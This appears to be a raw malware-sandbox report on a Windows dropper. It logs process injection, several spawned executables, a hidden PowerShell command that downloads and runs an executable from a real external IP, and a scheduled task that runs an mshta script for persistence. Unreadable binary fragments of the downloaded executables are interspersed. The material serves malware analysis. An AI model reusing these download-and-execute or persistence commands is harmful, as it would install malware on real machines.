„žUè.œƒÄ‰ÃPU袃ĉÇÇ$‰àPWS‰ëU‹l$(Uèԃă<$ue‹M;Mr(UèmƒÄ…ÀuPSèà›ƒÄ‰áQWPSU衃Ä‹M‹U ‰Š‹M‹U‰‹M‹t$ ‰4‘‹M‹U‰‘‹E‹M‰<ˆÿE‹E‰1ö‰ðƒÄ^_[]ÃÌÌÌÌÌÌÌÌÌÌÌÌSWV‹L$…Ét/‹T$¿1ö¶2…Ût‰øÁàøØF‰Ç9ñuèë ¸ë‰ø^_[ÃÌÌÌÌÌÌÌÌÌUSWVƒì‹D$,‹T$‹j Njz …ÿ„|M#l$(Gÿ‰D$‹B‰$ë EOt[‹t$!î‹$‹°ƒøÿtO‹J‹\$(9uߋJ ‹SèڋT$ ƒÄ;D$$uÆÿt$$Sÿt$(èȚ‹T$(ƒÄ …Àu­‹D$,Çë¾ÿÿÿÿ‰ðƒÄ^_[]ÃÌÌUSWVƒì,‹D$@‹h íƒýs½ÇD$ ‰l$(í)è¹ÍÌÌÌ÷á‰×Áï‰|$$­Pÿ°DƒÄ‰Æ‰D$ ÁçWÿ°DƒÄ‰D$‰D$Wÿ°DƒÄ‰Ã‰D$Wÿ°DƒÄ‰$‰D$W‹|$ÿ°DƒÄ‰D$…öt@…ÿt<…Ût8ƒ<$t2…Àt.1ÀÇ†ÿÿÿÿ‰ÁƒáƒðH9èrê‹|$@…ÿtG‹7ëEV‰Æÿ°DƒÄWÿ°DƒÄSÿ°DƒÄÿ4$ÿ°DƒÄVÿ°DƒÄ¸ÿÿÿÿƒÄ,^_[]Ã1ö‰t$ƒt61ې‹G ‹O‹,™Uÿ4˜D$PèÉüÿÿƒÄ …Àu%‰uC;_rÙjjWè_ ƒÄ t$¹ ó¥1ÀëšjjD$Pè? ƒÄ ë‚ÌÌÌÌÌÌÌÌÌÌUSWVƒì‰Ö‰Ïjÿ°DƒÄ1ۅÀ„"‰ÅÇÇ@j$ÿ°DƒÄ…À„¹‰t$ ‰(Ç@Ç@Ç@ Ç@Ç@Ç@Ç@Ç@
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@к´ Í!¸LÍ!This program cannot be run in DOS mode. $A{Ñk¿8¿8¿8 b<8¿8 b,8¿8¾8©¿8‡8 ¿8‡%8¿8‡"8¿8Rich¿8PELb|€Nà  t~B¯8@âý @…@¬´jíâ x)`” Ð.textŒrt `.rdatan+,x@@.dataœ+À¤@À.ndatað€À.rsrcjíî¦@@.relocÖð¼@BU‹ìƒì\ƒ} t+ƒ} F‹Eu ƒH‹ ´êG‰HPÿuÿu ÿuÿŒ’@éKSV‹5¼êGWE¤Pÿuÿ’@ƒeô‰E EäPÿuÿ”’@‹}ðƒeð‹D@鉶FR¶VV¯Uè‹Ï+Mè¯Á™÷ÿ‰M¶ÀÁà‰E¶FQ¯Á¶NU¯MèÁ™÷ÿ‹M¶VT¯Uè¶À ȶFP¯E™÷ÿÁá¶À ȍEôP‰MøÿH@ƒEðP‰EEäPÿu ÿ˜’@ÿuÿӃEè9}èŒnÿÿÿƒ~Xÿteÿv4ÿL@‰E…ÀtU‹} jWÇEäÇEèÿP@ÿvXWÿT@ÿu‹5X@WÿÖh ‰E EäPjÿh jGWÿœ’@ÿu WÿÖÿuÿӍE¤Pÿuÿ ’@_^3À[É‹L$¡ÈêG‹ÑiÒ @‹TöÂtUVWq3ÿ;5ÌêGsD‹ÎiÉ @DS‹öÁtGëöÁt ‹ÏO…Ét ëöÁu ‹Ù3ڃã3ىF @;5ÌêGrÊ[_^ÂU‹ìQQ‹US‹ÈêGV‹òiö @ó‹F3ÉW‰Mü‰Mø¨t 9M tƒà¾‰FB;ÌêGsD‹ÂiÀ @|‹BöÁt jRè¤ÿÿÿ‹öÁu(öÁ@tÿEüöÁtÿEüëÿEø‹Ð;ÌêGr¼3À_^[Ƀ}ütóƒ}øtƒN@ëç‹NáÿÿÿƒÉ‰Në֋L$¡ÈêGV3öƒù s695ÌêGv.PW‹¨u3ÿGÓç…zütƒÈëƒàþ‰FÂ @;5ÌêGr×_^ÂU‹ìƒì ¡¼êGƒeüSV”W‹=ÌêG‰Eø‹Eø3Û9tM;ßsG‹5ÈêGƒÆ‹öÂu*‹E…Àtƒ<˜t‹Mü3À@Óà‹Nüƒâ#ȉMô‹MüÓâ9Uôu CÆ @;ßrÄ;ßt ÿEüƒEøƒ}ü r‹Eü_^[É‹D$…Ày@iÀ@¹ðG+ÈQèüKÂV‹t$ëh‹ÆkÀÐêGƒ8t\Pèæ=ÿÿÿtUPè·ÿÿÿ…Àu@FëH‹Î‹ð+Áƒ|$ t/ŒjGjÿ5„jGh0uÿ5ŒjGÿP‘@Phÿt$ÿˆ’@…öy”3À^¸ÿÿÿëõ‹D$‹ ¼êGjÿtlèkÿÿÿÂhðAÿt$è[;¡äÀ@ÿ4ˆjèÜSPè;KËD$™3Â+‹äÀ@‹ÈÁøiÀ@Vƒáÿ4ŠèÀ@Pè©Sƒ|$‹ð}VèÍK‹Æ^ÂU‹ììSVWEüP¡ëGƒÈP3ÛSÿu ÿuÿ@;Ãui‹5@¿ë9]uKS…ðýÿÿPÿuüè²ÿÿÿ…ÀuW…ðýÿÿPSÿuüÿօÀtÕÿuüÿ@jèN;Ãt$Sÿ5ëGÿu ÿuÿÐë ÿuüÿ@3À@_^[É 9ëGuîÿu ÿuÿ @…ÀuÞëßU‹ì¡äÀ@‹@V…Àt‹ðë ‹5dëGÆ€EP¡ëG EPjj"èÓþÿÿPVÿ@÷ØÀ÷Ð#E^]ÂÌU‹ìì¬¡´êGSV‹uWjY}Ðó¥‹UԋM؋ò‹ùiö@iÿ@‰Eô¸ðGðøEÔ£äÀ@‹EÐ3ۃÀþ‰]üƒøG‡éÿ$…ø0@Rh´Ÿ@èÃL‹EÔYYéØSè@þÿÿPh”Ÿ@è¨LYYSÿuÔèl9¸ÿÿÿé²ÿtjG9]ôtëSÿ<’@ëâRè(ýÿÿpÿVh€Ÿ@èkLYYSVè0ýÿÿé|SèäýÿÿPh`Ÿ@èLLYYSÿuÔè9éP3Éè¬ýÿÿ‹ðVhLŸ@è(LYYƒþ3öFVÿŒ@é&h0Ÿ@èLYÿuôÿ@’@é ‹Â9]Üu%‹ …`ëG‰ … ëG3ÉAèSýÿÿ‹Mԉ`ëGéá‹ … ëG‰ …`ëGé΋u܍4µ`ëG‹3À;Ë”À#Mà‰‹D…Ôé¸ÿ4`ëG雡€jG‹5D’@;ÃtQPÿ֋UÔ¡ljG;Ä~RPÿÖéujðèçüÿÿÿu؋ðVhôž@èJKƒÄ ÿuØVÿˆ@…À…IÇEühÀž@è$KYé2jðè¤üÿÿÿu؉EPhˆž@èKƒÄ ÿuè±E‹ð;ó„†j\VèLE‹ð·>Sÿu3Àf‰ÿ„@…ÀuHÿ€@=·tÿ€@Pÿuh0ž@è°JƒÄ ÿEüë.ÿuÿ|@¨u!ÿuh¸@èŽJÿEüë ÿuhx@è|JYYf‰>ƒÆf;û…zÿÿÿhðA9]Øt"jæè)7ÿuh°pMè³Gÿuÿx@éSjõéòýÿÿSè¿ûÿÿ‹ðVè\J…ÀtÿuØVh @èJƒÄ ‹EØé,ÿuÜVh¸œ@èÿIƒÄ ‹EÜéjÐèzûÿÿjߋðèqûÿÿj‰Eègûÿÿ‹øWhœœ@èÍIYYÿuVÿt@…Àt hðAjãékýÿÿ9]Üt'VèØI…ÀtÿuVè^ShðAjäè\6Whpœ@ë WhLœ@ÇEüèsIYéIþÿÿSèôúÿÿ‹ðEPWh Vÿp@…Àt$‹E;Æv)f9t$VèpI;ÃtƒÀ,Pÿuè”Fë 3Àf‰ÇEü9]Ü…+h WWÿl@éjÿè‹úÿÿMQVh SPSÿh@…À…÷3ÀÇEüf‰éæjïèXúÿÿPVè D…À…ÐÇEüéÄj1è6úÿÿ‹ð‹EԋÈÁøVƒàƒáPQh؛@‰ủMè†HƒÄVèÿBV¾èÀ@…ÀtVèÓEëh°pMVèÆEPèÙLPèÖEVèãE¿ø@Aƒ}|1VèoH3É;ÃtMàQƒÀPÿd@‹È‹EƒÀý €#Á÷ØÀ@‰E9]uVè”C3Àƒ}•À@Ph@VèžC‰Eøƒøÿ…¿9]uwVh ›@èÕGYYhðGWè.EVhðGè#EÿuèhðAèMWhðGè E‹EÔÁøPhðAè‘Aƒèuhp›@è…GYé6ÿÿÿHt@h@›@èrGYVjúéÇúÿÿÿuÌjâè.4ƒ}uÇEüÿuVhðš@èDGƒÄ éPh¼š@è2GÿhëGYéCÿuÌjêèë3ÿ”ëGSSÿuøÿuÜè¹ÿ ”ëG‹øVWhŒš@èõFƒÄ ƒ}àÿuƒ}äÿtEàPSPÿuøÿ`@ÿuøÿ¼@
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELvtžßà. 0*I `@ à `…ÀHK`˜€ xH  H.text) * `.rsrc˜`0@@.reloc €6@B.rdata 8@À.rdataÀL@ÀðHHœµÐl5« 0ã þ8þ E%—8~: 8Òÿÿÿrps z*~¿(ý é  s ~À(þ8þ ~Á(~Â(  ?¬ÿÿÿ ~¡{¨:_ÿÿÿ& 8Tÿÿÿ€ ~¡{¦::ÿÿÿ& 8/ÿÿÿ(*&~þ*~*F~Ã( 8*.~Ä(*‚8 ~Ä(*~Å(8åÿÿÿ0c þ8þ E8*~Æ(&8ïÿÿÿrêp~Ã(  ~¡{w:ºÿÿÿ& 8¯ÿÿÿ.~Ç(*0Œ þ8þ E/08*~È(! ~¡{·:Ëÿÿÿ& 8Àÿÿÿ*~Ã( 8~É(% ~¡{¼9‘ÿÿÿ& 8†ÿÿÿ0G(8( ~¡{½9& 8 8Ìÿÿÿþ E8*&~þ*~*(Í*0ó þ8þ E«Ac8¦~~Ži~~Ži( ~¡{f:µÿÿÿ& 8ªÿÿÿ~~Ži~~Ži(8# ~¡{^:qÿÿÿ& 8fÿÿÿ*~~Ži@( 8@ÿÿÿ~ ˆ~(8¹ÿÿÿ0G(8( ~¡{`9& 8 8Ìÿÿÿþ E8*0]8þ E8*(8 %Ð ~Ê()€ ~¡{9·ÿÿÿ& 8¬ÿÿÿ^þ þ þ þ (*&~þ*~*(Í*0‡ þ8þ Eó½‹T™,–8î‘8r pŒ~Î(9~Ï(= ~¡{]:’ÿÿÿ& 8‡ÿÿÿ ~¡{¬9pÿÿÿ& 8eÿÿÿŽi< 8PÿÿÿX8àÿÿÿ*8gÿÿÿ ~¡{˜9)ÿÿÿ& 8ÿÿÿ~Ë(-~Ì(1 ~¡{œ:óþÿÿ& 8èþÿÿs ~Í(5~  ~¡{ˆ:ºþÿÿ& 8¯þÿÿ8Eÿÿÿ ~¡{x:–þÿÿ& 8‹þÿÿ08þ E2·Ž ¬…e[AÀ·M( éüÒÁñ_¦D¨"Ý…ßµ‘'˜I¡‡´tÒ~2–ÛHuÆ8². 8!ÿÿÿ-X~Ë(-/~Ñ(E~Ò(I~Ó(M]-8Ë51o 8Øþÿÿs 4 ~¡{P9½þÿÿ& 8²þÿÿ-X- 8¢þÿÿnj>Ø "8þÿÿrp/ 8|þÿÿ8#8QÿÿÿY 8aþÿÿ- 8Tþÿÿ1?+ÿÿÿ 8Bþÿÿ. þ8-þÿÿ8^ '8"þÿÿ+-2o œ 08 þÿÿs r,p5( 77~Ô(Q~Ï(=(! ~¡{[:Éýÿÿ& 8¾ýÿÿ1X1 8®ýÿÿ+--~Ð(Aœ *8“ýÿÿ*2+.‘o 8|ýÿÿ8 8mýÿÿ+-‘+.‘X~Ë(-/~Ñ(E~Ò(I~Ó(M]3 ~¡{Œ:!ýÿÿ& 8ýÿÿ8cÿÿÿ ~¡{i9ýüÿÿ& 8òüÿÿ8Ñ 1~¡{U:Ùüÿÿ& 8Îüÿÿ! >8
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@к´ Í!¸LÍ!This program cannot be run in DOS mode. $é¶ßYˆØŒYˆØŒYˆØŒ3”ÚŒpˆØŒYˆÙŒ[ˆØŒë”ÈŒ[ˆØŒYˆØŒVˆØŒáŽÞŒXˆØŒRichYˆØŒPEL—»‹dà  Þ¶0J@`JGT!@€[ðoàH ÐJ@à.rsrcHàZ@À.idata ð^@À 0)`@àjbypnjilð00âb@àrdkwtnsn JD @à.taggant00J"H @à
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEL%žgà f¬pJ@ JÚ×@€Wk€¬ø‘ pp@à.rsrc¬€€@À.idata ‚@À À* „@àrufmbtlx`0ú†@àkrhndclf`J€@à.taggant0pJ"†@à
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELˆ gà ~d°E@àEڙ€`‘EWUi ø ðØ@à.rsrc è@À.idata ì@À  ) î@àgfrqabhkàÀ+Öð@àclsldkbz EÆ@à.taggant0°E"Ê@à
request_handle: 0x00cc000c
1 1 0
Process injection Process 2592 called NtSetContextThread to modify thread in remote process 2760
Process injection Process 2084 called NtSetContextThread to modify thread in remote process 2696
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 1995571652
registers.esp: 1636628
registers.edi: 0
registers.eax: 4242016
registers.ebp: 0
registers.edx: 0
registers.ebx: -139264
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000208
process_identifier: 2760
1 0 0

NtSetContextThread

registers.eip: 1995571652
registers.esp: 2030304
registers.edi: 0
registers.eax: 4241728
registers.ebp: 0
registers.edx: 0
registers.ebx: -139264
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000208
process_identifier: 2696
1 0 0
parent_process powershell.exe martian_process C:\Users\test22\AppData\Local\TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
parent_process powershell.exe martian_process "C:\Users\test22\AppData\Local\TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE"
Process injection Process 2592 resumed a thread in remote process 2760
Process injection Process 2188 resumed a thread in remote process 1728
Process injection Process 2084 resumed a thread in remote process 2696
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000208
suspend_count: 1
process_identifier: 2760
1 0 0

NtResumeThread

thread_handle: 0x00000088
suspend_count: 0
process_identifier: 1728
1 0 0

NtResumeThread

thread_handle: 0x00000208
suspend_count: 1
process_identifier: 2696
1 0 0
option -windowstyle hidden value Attempts to execute command with a hidden window
value Uses powershell to execute a file download from the command line
option -windowstyle hidden value Attempts to execute command with a hidden window
value Uses powershell to execute a file download from the command line
cmdline C:\Windows\system32\cmd.exe /c schtasks /create /tn X0P6emaCZCT /tr "mshta C:\Users\test22\AppData\Local\Temp\kCFxj8yNd.hta" /sc minute /mo 25 /ru "test22" /f
cmdline schtasks /create /tn X0P6emaCZCT /tr "mshta C:\Users\test22\AppData\Local\Temp\kCFxj8yNd.hta" /sc minute /mo 25 /ru "test22" /f
Time & API Arguments Status Return Repeated

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: ed 64 8f 05 00 00 00 00 57 89 0c 24 54 59 83 ec
exception.symbol: tempfwkb4v1ve0ehhtjiyxh8aqzl1m4480k2+0x1f6247
exception.instruction: in eax, dx
exception.module: TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
exception.exception_code: 0xc0000096
exception.offset: 2056775
exception.address: 0xab6247
registers.esp: 2685904
registers.edi: 4141225
registers.eax: 1447909480
registers.ebp: 3999641620
registers.edx: 22104
registers.ebx: 1969033397
registers.esi: 11215821
registers.ecx: 20
1 0 0
Time & API Arguments Status Return Repeated

LdrGetProcedureAddress

ordinal: 0
function_address: 0x0018fe29
function_name: wine_get_version
module: ntdll
module_address: 0x76f10000
3221225785 0
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2628
thread_handle: 0x00000154
process_identifier: 2624
current_directory: C:\Users\test22\AppData\Local\Temp
filepath:
track: 1
command_line: C:\Windows\system32\cmd.exe /c schtasks /create /tn X0P6emaCZCT /tr "mshta C:\Users\test22\AppData\Local\Temp\kCFxj8yNd.hta" /sc minute /mo 25 /ru "test22" /f
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x00000158
1 1 0

CreateProcessInternalW

thread_identifier: 2672
thread_handle: 0x00000158
process_identifier: 2668
current_directory: C:\Users\test22\AppData\Local\Temp
filepath:
track: 1
command_line: mshta C:\Users\test22\AppData\Local\Temp\kCFxj8yNd.hta
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x00000154
1 1 0

CreateProcessInternalW

thread_identifier: 2732
thread_handle: 0x00000084
process_identifier: 2728
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\schtasks.exe
track: 1
command_line: schtasks /create /tn X0P6emaCZCT /tr "mshta C:\Users\test22\AppData\Local\Temp\kCFxj8yNd.hta" /sc minute /mo 25 /ru "test22" /f
filepath_r: C:\Windows\system32\schtasks.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000088
1 1 0

NtResumeThread

thread_handle: 0x00000104
suspend_count: 1
process_identifier: 2668
1 0 0

NtResumeThread

thread_handle: 0x0000027c
suspend_count: 1
process_identifier: 2668
1 0 0

CreateProcessInternalW

thread_identifier: 2832
thread_handle: 0x00000338
process_identifier: 2828
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'FWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000344
1 1 0

NtResumeThread

thread_handle: 0x00000294
suspend_count: 1
process_identifier: 2828
1 0 0

NtResumeThread

thread_handle: 0x000002e8
suspend_count: 1
process_identifier: 2828
1 0 0

NtResumeThread

thread_handle: 0x00000444
suspend_count: 1
process_identifier: 2828
1 0 0

NtResumeThread

thread_handle: 0x0000056c
suspend_count: 1
process_identifier: 2828
1 0 0

NtResumeThread

thread_handle: 0x00000598
suspend_count: 1
process_identifier: 2828
1 0 0

CreateProcessInternalW

thread_identifier: 3028
thread_handle: 0x00000660
process_identifier: 3024
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
track: 1
command_line: "C:\Users\test22\AppData\Local\TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE"
filepath_r: C:\Users\test22\AppData\Local\TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000668
1 1 0

NtResumeThread

thread_handle: 0x0000067c
suspend_count: 1
process_identifier: 2828
1 0 0

NtResumeThread

thread_handle: 0x000001e4
suspend_count: 1
process_identifier: 3024
1 0 0

CreateProcessInternalW

thread_identifier: 2200
thread_handle: 0x000003d8
process_identifier: 2192
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\abc3bc1985\skotes.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\abc3bc1985\skotes.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\abc3bc1985\skotes.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000003e0
1 1 0

NtResumeThread

thread_handle: 0x000001a0
suspend_count: 1
process_identifier: 2192
1 0 0

CreateProcessInternalW

thread_identifier: 2596
thread_handle: 0x00000474
process_identifier: 2592
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\1014060001\790548e77c.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\1014060001\790548e77c.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\1014060001\790548e77c.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000478
1 1 0

CreateProcessInternalW

thread_identifier: 2724
thread_handle: 0x0000044c
process_identifier: 2792
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\1034761001\13Z5sqy.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\1034761001\13Z5sqy.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\1034761001\13Z5sqy.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000484
1 1 0

CreateProcessInternalW

thread_identifier: 2928
thread_handle: 0x00000384
process_identifier: 3004
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\1039270001\jonbDes.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\1039270001\jonbDes.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\1039270001\jonbDes.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000480
1 1 0

CreateProcessInternalW

thread_identifier: 2980
thread_handle: 0x00000468
process_identifier: 3064
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\1051791001\tYrnx75.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\1051791001\tYrnx75.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\1051791001\tYrnx75.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000488
1 1 0

CreateProcessInternalW

thread_identifier: 2088
thread_handle: 0x0000047c
process_identifier: 2084
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\1065345001\up7d8Ym.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\1065345001\up7d8Ym.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\1065345001\up7d8Ym.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000048c
1 1 0

CreateProcessInternalW

thread_identifier: 2620
thread_handle: 0x000003ac
process_identifier: 2744
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\1065531001\012Bdpb.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\1065531001\012Bdpb.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\1065531001\012Bdpb.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000494
1 1 0

CreateProcessInternalW

thread_identifier: 744
thread_handle: 0x00000480
process_identifier: 2056
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\1068334001\7fOMOTQ.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\1068334001\7fOMOTQ.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\1068334001\7fOMOTQ.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000048c
1 1 0

CreateProcessInternalW

thread_identifier: 2260
thread_handle: 0x00000468
process_identifier: 3028
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\1071208001\Bjkm5hE.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\1071208001\Bjkm5hE.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\1071208001\Bjkm5hE.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000490
1 1 0

NtResumeThread

thread_handle: 0x000000dc
suspend_count: 1
process_identifier: 2592
1 0 0

NtResumeThread

thread_handle: 0x00000150
suspend_count: 1
process_identifier: 2592
1 0 0

NtResumeThread

thread_handle: 0x00000184
suspend_count: 1
process_identifier: 2592
1 0 0

CreateProcessInternalW

thread_identifier: 2772
thread_handle: 0x00000208
process_identifier: 2760
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\1014060001\790548e77c.exe
track: 1
command_line:
filepath_r: C:\Users\test22\AppData\Local\Temp\1014060001\790548e77c.exe
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000204
1 1 0

NtGetContextThread

thread_handle: 0x00000208
1 0 0

NtAllocateVirtualMemory

process_identifier: 2760
region_size: 380928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000204
1 0 0

WriteProcessMemory

buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELð¤gà bª`º@Ð@…YœŒ°9œ´.textÊ`b `.rdataó €"f@@.data|ѰNˆ@À.reloc°9:Ö@B
base_address: 0x00400000
process_identifier: 2760
process_handle: 0x00000204
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00401000
process_identifier: 2760
process_handle: 0x00000204
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00448000
process_identifier: 2760
process_handle: 0x00000204
1 1 0

WriteProcessMemory

buffer:
base_address: 0x0044b000
process_identifier: 2760
process_handle: 0x00000204
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00459000
process_identifier: 2760
process_handle: 0x00000204
1 1 0

WriteProcessMemory

buffer: @
base_address: 0xfffde008
process_identifier: 2760
process_handle: 0x00000204
1 1 0

NtSetContextThread

registers.eip: 1995571652
registers.esp: 1636628
registers.edi: 0
registers.eax: 4242016
registers.ebp: 0
registers.edx: 0
registers.ebx: -139264
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000208
process_identifier: 2760
1 0 0

NtResumeThread

thread_handle: 0x00000208
suspend_count: 1
process_identifier: 2760
1 0 0

NtGetContextThread

thread_handle: 0x000000f4
1 0 0

NtResumeThread

thread_handle: 0x000000f4
suspend_count: 1
process_identifier: 2792
1 0 0

NtGetContextThread

thread_handle: 0x00000108
1 0 0

NtResumeThread

thread_handle: 0x00000108
suspend_count: 1
process_identifier: 2792
1 0 0

NtGetContextThread

thread_handle: 0x00000100
1 0 0

NtResumeThread

thread_handle: 0x00000100
suspend_count: 1
process_identifier: 2792
1 0 0

NtGetContextThread

thread_handle: 0x00000100
1 0 0

NtResumeThread

thread_handle: 0x00000100
suspend_count: 1
process_identifier: 2792
1 0 0

NtGetContextThread

thread_handle: 0x00000104
1 0 0

NtResumeThread

thread_handle: 0x00000104
suspend_count: 1
process_identifier: 2792
1 0 0

NtGetContextThread

thread_handle: 0x00000100
1 0 0

NtResumeThread

thread_handle: 0x00000100
suspend_count: 1
process_identifier: 2792
1 0 0
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
